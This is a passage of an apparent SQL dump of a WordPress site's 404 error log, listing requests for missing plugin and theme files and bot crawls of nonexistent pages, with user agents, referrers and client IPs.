Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37730,'2023-01-29 09:01:51','/wp-content/plugins/armember-membership/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37731,'2023-01-29 09:02:01','/wp-content/plugins/armember/js/arm_widgets_js.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37732,'2023-01-29 09:02:07','/wp-content/plugins/armember/documentation/index.html','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37733,'2023-01-29 09:02:12','/wp-content/plugins/alphabetic-pagination/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37734,'2023-01-29 09:02:29','/wp-content/plugins/wp-automatic/css/wp-automatic.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37735,'2023-01-29 09:02:35','/wp-content/plugins/booking-calendar/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37736,'2023-01-29 09:02:41','/wp-content/plugins/mstore-api/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37737,'2023-01-29 09:02:46','/wp-content/plugins/jobboardwp/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37738,'2023-01-29 09:02:58','/wp-content/plugins/nd-restaurant-reservations/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37739,'2023-01-29 09:03:03','/wp-content/plugins/nd-booking/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37740,'2023-01-29 09:03:10','/wp-content/plugins/wp-live-chat-support-pro/css/wplc_styles_pro.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37741,'2023-01-29 09:03:15','/wp-content/plugins/wp-user-extra-fields/js/wpuef-configurator.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.141 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37742,'2023-01-29 09:03:21','/wp-content/plugins/woocommerce-upload-files/js/wcuf-admin-menu.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37743,'2023-01-29 09:03:27','/wp-content/plugins/wp-file-manager/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37744,'2023-01-29 09:03:34','/wp-content/plugins/superlogoshowcase-wp/css/sls-wp-admin.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37745,'2023-01-29 09:03:45','/wp-content/plugins/membership-for-woocommerce/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37746,'2023-01-29 09:03:51','/wp-content/themes/greyd_suite/style.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37747,'2023-01-29 09:04:02','/wp-content/plugins/ninja-forms/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37748,'2023-01-29 09:04:07','/wp-content/themes/workreap/style.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37749,'2023-01-29 09:04:34','/wp-content/plugins/capabilities-pro/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37750,'2023-01-29 09:04:40','/wp-content/plugins/angwp/__%20UPDATES.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37751,'2023-01-29 09:04:46','/wp-content/plugins/vc-tabs/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37752,'2023-01-29 09:04:52','/wp-content/plugins/dzs-zoomsounds/admin/admin.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37753,'2023-01-29 09:04:58','/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37754,'2023-01-29 09:05:03','/wp-content/themes/listingo/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37755,'2023-01-29 09:05:14','/wp-content/plugins/nd-shortcodes/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37756,'2023-01-29 09:05:20','/wp-content/plugins/ultimate-member/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37757,'2023-01-29 09:05:26','/wp-content/plugins/wp-upg/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37758,'2023-01-29 09:05:37','/wp-content/plugins/wpgateway/css/style.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37759,'2023-01-29 09:05:48','/wp-content/plugins/yith-woocommerce-gift-cards-premium/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37760,'2023-01-29 09:05:54','/wp-content/plugins/wp-automatic/changelog','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37761,'2023-01-29 09:06:00','/wp-content/plugins/image-hover-effects-ultimate/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37762,'2023-01-29 09:06:06','/wp-content/plugins/woo-product-table/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37763,'2023-01-29 09:06:12','/wp-content/plugins/shortcode-addons/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37764,'2023-01-29 09:06:17','/wp-content/plugins/scripts-organizer/plugins/meta-box/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.141 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37765,'2023-01-29 09:06:29','/wp-content/plugins/ait-csv-import-export/changelog.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.141 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37766,'2023-01-29 09:06:45','/wp-content/plugins/super-interactive-maps/css/sim-wp-admin.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37767,'2023-01-29 09:06:56','/wp-content/plugins/capability-manager-enhanced/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37768,'2023-01-29 09:07:02','/wp-content/plugins/superstorefinder-wp/css/ssf-wp-admin.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37769,'2023-01-29 09:28:40','/start-your-feel-good-exercise-routine-with-us','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.101 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.65.125'),(37770,'2023-01-29 09:52:50','/exarticulation/aywzorkd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37771,'2023-01-29 10:02:39','/ectropion/iwrq461e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37772,'2023-01-29 10:15:29','/astroscope/aahf491e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37773,'2023-01-29 10:26:53','/dsey5pbg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37774,'2023-01-29 10:35:35','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37775,'2023-01-29 10:50:02','/kc5ir32e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37776,'2023-01-29 11:02:23','/transporter/whylyoce2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37777,'2023-01-29 11:14:10','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; ja) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37778,'2023-01-29 11:16:35','/utilize/ae8vy6jd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37779,'2023-01-29 11:19:24','/asbe81kf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37780,'2023-01-29 11:22:51','/saliant35/w9118uif2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37781,'2023-01-29 11:31:13','/mongols/1pilhi1h2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37782,'2023-01-29 11:31:36','/isk3vfyg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37783,'2023-01-29 11:32:24','/iye799wg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37784,'2023-01-29 12:03:12','/im6t0n3e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37785,'2023-01-29 12:04:59','/noctule/as7tfzue2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37786,'2023-01-29 12:17:10','/t21fp1qe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37787,'2023-01-29 12:28:23','/kk17onme2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37788,'2023-01-29 12:30:26','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 Edg/86.0.622.51','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37789,'2023-01-29 12:48:43','/headsail32/km0m0okd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37790,'2023-01-29 12:51:00','/ads.txt','https://www.dailyjolly.co.uk','Bidtellect/0.0.1134.0',NULL,404,'GET',NULL,'128.241.2.170'),(37791,'2023-01-29 12:51:00','/ads.txt','https://www.dailyjolly.co.uk','Bidtellect/0.0.1134.0',NULL,404,'GET',NULL,'128.241.2.170'),(37792,'2023-01-29 12:53:20','/articles/shield0','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37793,'2023-01-29 12:53:40','/1tp6s2eg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37794,'2023-01-29 12:53:56','/1ysua31e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37795,'2023-01-29 12:58:54','/ontogeny/asvcnzig2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37796,'2023-01-29 13:00:21','/d9jrkb5e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37797,'2023-01-29 13:20:41','/weakly54/d6n3utjd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37798,'2023-01-29 13:22:43','/wthgxqce2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37799,'2023-01-29 13:24:04','/boomer/1d6se6ie2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37800,'2023-01-29 13:29:55','/spectroscopy/932333ie2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37801,'2023-01-29 13:29:57','/kameela/k2757sjd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37802,'2023-01-29 13:46:08','/i28kcv6g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37803,'2023-01-29 13:49:23','/crescence/amtjyiue2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37804,'2023-01-29 13:56:51','/sign/ispulpfg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37805,'2023-01-29 14:00:29','/thridded/9ir8yj3e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37806,'2023-01-29 14:08:44','/ads.txt','https://www.dailyjolly.co.uk','AdsTxtCrawler/1.0.2',NULL,404,'GET',NULL,'44.204.165.84'),(37807,'2023-01-29 14:27:53','/dumfounded/wh6qlb8f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37808,'2023-01-29 14:44:08','/aphorism/w3zibz9e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37809,'2023-01-29 14:45:25','/d26q442e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37810,'2023-01-29 14:48:21','/wp-content/plugins/learnpress/assets/js/dist/utils.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,404,'GET',NULL,'75.119.157.105'),(37811,'2023-01-29 14:59:00','/advice/mutton4','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37812,'2023-01-29 15:00:14','/viaticum/as3xrwme2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37813,'2023-01-29 15:17:14','/akcnwmee2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37814,'2023-01-29 15:29:15','/iex8qsxe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37815,'2023-01-29 15:31:01','/procrastine30/tjzlk16f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37816,'2023-01-29 15:37:29','/ads.txt','https://www.dailyjolly.co.uk','Google-adstxt',NULL,404,'GET',NULL,'66.249.65.123'),(37817,'2023-01-29 15:54:10','/needlebush/tj9jwr1e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37818,'2023-01-29 15:55:21','/warm/i8mt10fg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37819,'2023-01-29 16:00:00','/1xujgljd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37820,'2023-01-29 16:12:44','/leyte/d1phjuwe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37821,'2023-01-29 16:19:19','/naughty/9fp2fi6e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.61'),(37822,'2023-01-29 16:25:01','/w5o7ssie2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) 